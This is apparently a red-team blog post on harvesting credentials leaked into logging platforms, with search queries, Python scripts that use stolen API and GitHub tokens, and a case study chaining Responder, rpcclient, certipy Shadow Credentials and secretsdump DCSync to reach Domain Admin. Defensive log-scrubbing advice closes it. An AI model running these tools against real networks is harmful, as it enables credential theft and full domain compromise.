In penetration testing and red teaming, success often lies in uncovering hidden paths of least resistance. While sophisticated exploits and zero-days frequently capture headlines, highly effective attack opportunities often hide in plain sight – like within internal logging and monitoring platforms.
At Praetorian, we’ve observed first-hand the value of targeting internal logging and monitoring platforms during our engagements. This is not due to vulnerabilities in the platforms themselves, but because systems like Datadog, Kibana, and Sumo Logic frequently contain credentials, API keys, and other sensitive information inadvertently logged by users. Penetration testers and red teams can leverage these exposed secrets to accelerate progress toward their objectives while maintaining a low detection profile. The tactic has proven consistently lucrative on recent internal network assessments and red team operations, precisely because we’re using legitimate functionality to access information that should never have been logged in the first place.
In this post, we’ll explore why internal logging and monitoring platforms represent prime targets, discuss effective techniques for identifying sensitive data within them, and demonstrate how our team has leveraged these platforms to achieve comprehensive domain compromise.
Why Target Logging and Monitoring Platforms?
Modern organizations have embraced centralized logging and monitoring solutions for improved visibility, troubleshooting, and security insights. However, this centralization creates an attractive target for several reasons:
- Credential Exposure: Developers frequently log sensitive information during troubleshooting, including API keys, access tokens, and plaintext credentials.
- OPSEC Advantages: Querying logging platforms resembles legitimate user activity and rarely triggers security alerts, unlike traditional scanning tools or exploitation techniques.
- Extensive Access: These platforms typically have visibility across the entire infrastructure, from development environments to production systems, which often includes valuable information about organizational structure and technology.
- Historical Data: You can discover credentials and information that might not be actively used but remain valid, sometimes dating back months or years.
- Legitimate Tools: Using the client’s own systems removes the need to introduce potentially flagged software into the environment.
Common Platforms and Their Value
There are countless internal logging and monitoring platforms. While the platforms themselves aren’t inherently vulnerable, the way organizations configure and use them often creates security risks. As a general rule, when we encounter a logging and monitoring platform, these are the common things we look for to identify sensitive information:
- Authentication events and failures (often contain attempted credentials)
- Error logs containing connection strings or credentials
- API interactions with authorization headers and tokens
- Deployment and CI/CD pipeline logs with environment variables and build credentials
- Container startup logs with secrets
- Configuration changes exposing credentials
- Dashboard configurations with hardcoded secrets
- Custom metrics with embedded API keys
- Technology stacks deployed in the environment
- Internal organization processes
If you’re interested in specific details, below are a few platforms we’ve encountered recently along with some search patterns that have successfully yielded credentials.
Datadog
Datadog is a unified monitoring platform that combines metrics, traces, and logs. Its comprehensive logging capabilities make it particularly valuable for hunting secrets.
Effective search patterns:
Note: The search patterns in this post are examples illustrating the search format. Expand them with your own queries based on the context of the environment and the information you intend to find.
"password" OR "credential" OR "secret"
"api_key" OR "apikey" OR "api-key"
"access_key" OR "accesskey" OR "access-key"
"token" OR "auth_token" OR "authorization:"
"connection string" OR "connectionstring"
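When you want to sweep many patterns at once rather than paging through the UI, the same queries can be run programmatically through Datadog’s v2 Logs Search API. The sketch below is a minimal example and assumes you have a valid API key and application key recovered during the engagement; the site URL varies by tenant:

```python
import json
import urllib.request

DD_SITE = "https://api.datadoghq.com"  # varies by tenant (e.g. datadoghq.eu)

def build_search_body(query: str, limit: int = 50, window: str = "now-7d") -> dict:
    """Build a request body for Datadog's Logs Search API (POST /api/v2/logs/events/search)."""
    return {
        "filter": {"query": query, "from": window, "to": "now"},
        "page": {"limit": limit},
    }

def search_logs(api_key: str, app_key: str, query: str) -> list:
    """Submit one query and return the matching log events."""
    req = urllib.request.Request(
        f"{DD_SITE}/api/v2/logs/events/search",
        data=json.dumps(build_search_body(query)).encode(),
        headers={
            "DD-API-KEY": api_key,
            "DD-APPLICATION-KEY": app_key,
            "Content-Type": "application/json",
        },
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp).get("data", [])
```

Iterating the patterns above through search_logs and grepping the returned messages keeps your footprint down to a handful of ordinary-looking API calls.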
Kibana/Elasticsearch
Kibana provides a visualization layer for Elasticsearch data, often serving as an organization’s central logging repository.
Effective search patterns (Kibana Query Language):
message:password OR message:credential OR message:secret
message:*api_key* OR message:*apikey* OR message:*api-key*
message:*token* AND NOT (message:*validate* OR message:*invalid*)
message:*AKIA* OR tags:aws_access_key
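When Kibana sits in front of a directly reachable Elasticsearch cluster, the same hunting can be done against the `_search` API using Lucene query strings, which avoids the Kibana UI entirely. This is a sketch: the host and the assumption of unauthenticated access are illustrative, based on misconfigurations like the one in the case study later in this post:

```python
import json
import urllib.request

ES_URL = "http://elasticsearch.internal:9200"  # hypothetical unauthenticated node

def build_search_body(lucene: str, size: int = 25) -> dict:
    """Build an Elasticsearch _search body from a Lucene query string."""
    return {
        "size": size,
        "query": {"query_string": {"query": lucene}},
        "_source": ["@timestamp", "message"],
    }

def search(index_pattern: str, lucene: str) -> list:
    """Run the query against one or more indices (e.g. 'logstash-*')."""
    req = urllib.request.Request(
        f"{ES_URL}/{index_pattern}/_search",
        data=json.dumps(build_search_body(lucene)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return [hit["_source"] for hit in json.load(resp)["hits"]["hits"]]
```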
Sumo Logic
Sumo Logic is a cloud-based log management and analytics service that provides real-time insights from machine-generated data. Its powerful search capabilities make it an excellent tool for security investigations and secret hunting.
Effective search patterns:
_sourceCategory=*production* AND (*password* OR *credential* OR *secret*)
_sourceCategory=*api* AND (*api_key* OR *apikey* OR *token* OR *bearer*)
_sourceCategory=*deploy* AND (*access_key* OR *accesskey* OR *key*)
_source=*aws* AND *AKIA*
error AND (*connection* OR *connect* OR *string* OR *jdbc*)
Search syntax tips:
- Use _sourceCategory, _source, and _sourceHost to narrow down log sources
- Boolean operators: AND, OR, NOT for complex queries
- Wildcards: * for matching any character sequence
- Field extraction: | parse "key=*" as secret_key to extract specific values
- Consider the context of the systems the client has in their environment:
  - Would an exposed JWT gain you additional access that could be valuable?
  - Does the client have a CI/CD pipeline?
- Look for error messages that may inadvertently expose sensitive data
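However you export results from these platforms (UI download, API, or copy-paste), triaging thousands of matched lines by hand is slow. A small regex pass over the exported text surfaces the highest-value hits quickly. The patterns below are illustrative, not exhaustive; extend them for the secret formats used in the target environment:

```python
import re

# Illustrative patterns for common secret formats; extend per environment.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "bearer_token": re.compile(r"(?i)\bauthorization:\s*bearer\s+[A-Za-z0-9._~+/-]+=*"),
    "password_kv": re.compile(r"(?i)\b(password|passwd|pwd)\s*[=:]\s*\S+"),
}

def triage(lines):
    """Yield (pattern_name, matched_text, full_line) for every hit."""
    for line in lines:
        for name, pattern in SECRET_PATTERNS.items():
            for match in pattern.finditer(line):
                yield name, match.group(0), line.strip()
```

Feed it an exported file, e.g. `for name, secret, line in triage(open("export.log")): ...`, and review the hits grouped by pattern name.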
Case Study: From Unauthenticated Kibana to Domain Admin
The following case study from a recent Praetorian engagement demonstrates the effectiveness of this approach, showing how monitoring platforms can serve as an initial access vector for a sophisticated attack chain.
At a high level, the attack path ran: unauthenticated Kibana → GitHub PAT in CI/CD logs → secrets in private repositories → DevOps platform admin access → LDAP authentication coercion → service account compromise → Shadow Credentials against a domain controller → DCSync → Domain Admin.
Initial Discovery: Unauthenticated Kibana
During an internal network assessment, our team discovered an unauthenticated Kibana instance accessible on the client’s internal network. This misconfiguration provided immediate access to a wealth of logs without requiring any credentials, and we immediately recognized the opportunity it presented.
Extracting GitHub Credentials
We methodically searched through the accessible logs, using targeted queries to locate authentication information:
message:*github* AND message:*ghp_*
This query revealed logs from a CI/CD pipeline containing a GitHub Personal Access Token (PAT) with elevated repository access. The token had been inadvertently captured in the logs when a developer was troubleshooting a failed deployment.
{
  "status": ["loadbalancerstatus", "operationshealthcheck", "serviceinfo"],
  "GITHUB_TOKEN": "ghp_a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6q7r8s9",
  "GITHUB_OWNER": "exampleorg"
}
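Before acting on a recovered token, it is worth confirming it is still live and seeing what it can reach. GitHub’s REST API returns the authenticated user on `/user`, and for classic PATs the `X-OAuth-Scopes` response header lists the granted scopes. A minimal check, assuming only the token recovered from the logs:

```python
import json
import urllib.request

def parse_scopes(header_value: str) -> list:
    """Split the comma-separated X-OAuth-Scopes header into a scope list."""
    return [s.strip() for s in header_value.split(",") if s.strip()]

def check_github_pat(token: str) -> dict:
    """Validate a GitHub PAT and report its login and granted scopes."""
    req = urllib.request.Request(
        "https://api.github.com/user",
        headers={
            "Authorization": f"token {token}",
            "Accept": "application/vnd.github+json",
        },
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        scopes = parse_scopes(resp.headers.get("X-OAuth-Scopes", ""))
        login = json.load(resp).get("login")
    return {"login": login, "scopes": scopes}
```

A token with the `repo` scope, like the one here, grants read access to every repository the owning user can see.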
GitHub Repository Enumeration
With the GitHub PAT in hand, we gained access to the organization’s private repositories. Using our open-source secrets scanning tool Nosey Parker, we scanned these repositories for additional credentials:
noseyparker scan --github-organization $ORG_NAME
Among various secrets discovered, we identified administrator credentials for a DevOps platform deployed in the client’s environment. The credentials were stored in plaintext within a deployment configuration file.
class ServerManager:
    def __init__(self, name, url):
        self.app = App(outdir=name)
        self.stack = ServerResource(self.app, name)
        ResourceProvider(
            self.stack, name,
            url=url,
            username='devops_admin',
            password='S3cureP@ssw0rd123!'
        )
        user_groups(self.stack)

    def get_instance(self):
        return (self.app, self.stack)

prod = ServerManager('prod_server', 'http://example.com').get_instance()
back = ServerManager('back_server', 'http://10.10.10.10:9999/devops').get_instance()
DevOps LDAP Integration
Using the discovered admin credentials, we authenticated to the DevOps platform admin console. Examining the client’s system configuration, we identified that the platform was integrated with Active Directory using standard LDAP authentication. The LDAP configuration revealed:
- Connection details to domain controllers
- Service account name being used for LDAP queries (devops_prod)
- Authentication method (cleartext)
Most importantly, we identified that platform administrators could modify the LDAP server settings and trigger a connection test, forcing the service to authenticate using its service account credentials to our chosen server.
LDAP Authentication Coercion
At this point, we set up our attack infrastructure to capture the LDAP authentication:
sudo responder -I $INTERFACE
After modifying the DevOps platform’s LDAP configuration to point to our attacker machine and clicking “Test Connection”, we successfully captured the cleartext password for the devops_prod account.
Service Account Privilege Escalation
Authentication as devops_prod gave us access to perform BloodHound analysis of the Active Directory environment. This analysis revealed that the compromised service account had the following permissions:
- GenericAll permissions over the Enterprise Key Admins group
- Members of the Enterprise Key Admins group were granted the AddKeyCredentialLink permission over a domain controller
- The domain controller has DCSync rights for the domain
This level of access gives us a clear path to Domain Admin and allows us to:
- Add our compromised user to the Enterprise Key Admins group
- Leverage the AddKeyCredentialLink permission to perform a Shadow Credentials attack against the domain controller and compromise its machine account
- Utilize the compromised domain controller’s machine account to execute a DCSync to extract any credentials in the domain.
Making Ourselves an Administrator
We first leveraged the GenericAll permission to add the service account (devops_prod) to the Enterprise Key Admins group:
rpcclient -U "domain.local\devops_prod%PASS_HERE" "$DC_HERE" -c 'addmem "Enterprise Key Admins" devops_prod'
Shadow Credentials
With our controlled account now a member of Enterprise Key Admins, we were positioned to perform the Shadow Credentials attack against a domain controller:
certipy shadow auto -u devops_prod@domain.local -p 'PASS_HERE' -account DC_ACCOUNT$
This granted us the NT hash for the domain controller’s computer account.
DCSync and Domain Admin Access
With domain controller computer account privileges, we executed a DCSync attack to extract credentials for a Domain Admin account of our choice:
secretsdump -just-dc-user SUPER_ADMIN -hashes :"$NT_HASH" "domain.local"/"DC_MACHINE_ACCOUNT$"@"$DC_IP"
Takeaway
The entire attack chain was executed without deploying malware or exploiting traditional vulnerabilities. Instead, we leveraged legitimate access paths established through credential discoveries, beginning with an improperly secured monitoring platform—a single instance of an accidentally exposed GitHub credential in Kibana logs initiated a cascading series of privilege escalations. This case highlights how modern enterprise environments can be compromised through “living off the land” techniques and why strong credential management and monitoring platform security must be prioritized in defense strategies.
Hunting Strategy Recommendations
Based on our experience, we recommend the following strategies:
- Start with Recent Data: Begin by searching the last 7 days of logs, then expand if needed.
- Focus on High-Value Targets: Prioritize logs from authentication systems, CI/CD pipelines, and deployment tools.
- Look for Errors: Failed operations and error messages often contain the richest information.
- Use Context: Include application or service names in your searches to reduce false positives.
- Chain Discoveries: Use each credential you find to access new systems and hunt for more information.
Detection and Prevention Recommendations
For defenders looking to mitigate these risks, we recommend:
- Log Scrubbing: Implement log scrubbing to prevent sensitive information from being stored in logging platforms.
- Access Control: Apply strict access controls to logging and monitoring platforms. These platforms should never be exposed to unauthenticated users.
- Secret Scanning: Use automated tools to detect secrets in logs and alert when they’re found.
- Credential Rotation: Regularly rotate credentials, especially service account passwords and API keys.
- Query Monitoring: Implement alerting for suspicious search patterns in logging platforms.
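The first recommendation is the most impactful: secrets that never reach the logging platform cannot be harvested from it. A scrubbing step can live in the log shipper’s processing pipeline or in application code; the sketch below shows the idea as a simple redaction filter, with example rules that would need tuning per environment:

```python
import re

# Example redaction rules; real deployments should tune these per environment.
REDACTION_RULES = [
    (re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "[REDACTED-AWS-KEY]"),
    (re.compile(r"\bghp_[A-Za-z0-9]{36}\b"), "[REDACTED-GITHUB-PAT]"),
    (re.compile(r"(?i)\b(password|passwd|pwd|secret|api_key|token)(\s*[=:]\s*)\S+"),
     r"\1\2[REDACTED]"),
]

def scrub(line: str) -> str:
    """Apply every redaction rule to one log line before it is shipped."""
    for pattern, replacement in REDACTION_RULES:
        line = pattern.sub(replacement, line)
    return line
```

Running every line through a filter like this before ingestion would have removed the GitHub PAT in the case study above before it ever landed in Kibana.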
Weaponizing Transparency
Our recent engagements at Praetorian have repeatedly demonstrated that internal logging and monitoring platforms represent extremely valuable and often underutilized information sources during penetration tests and red team assessments. By understanding how to effectively search these platforms, security teams can discover credentials and sensitive information that dramatically accelerate the path to objective completion—all while maintaining a low profile.
This approach has been particularly effective over the past year, as organizations improve their security posture against traditional attack vectors while overlooking these logging platforms as potential sources of sensitive information. As defenders strengthen these conventional defenses, attackers adapt by finding the path of least resistance—and increasingly, that path runs through the very systems designed to provide visibility and security. The next time you’re on an assessment, don’t immediately reach for scanning and exploitation tools. Instead, explore what the target is already logging about itself.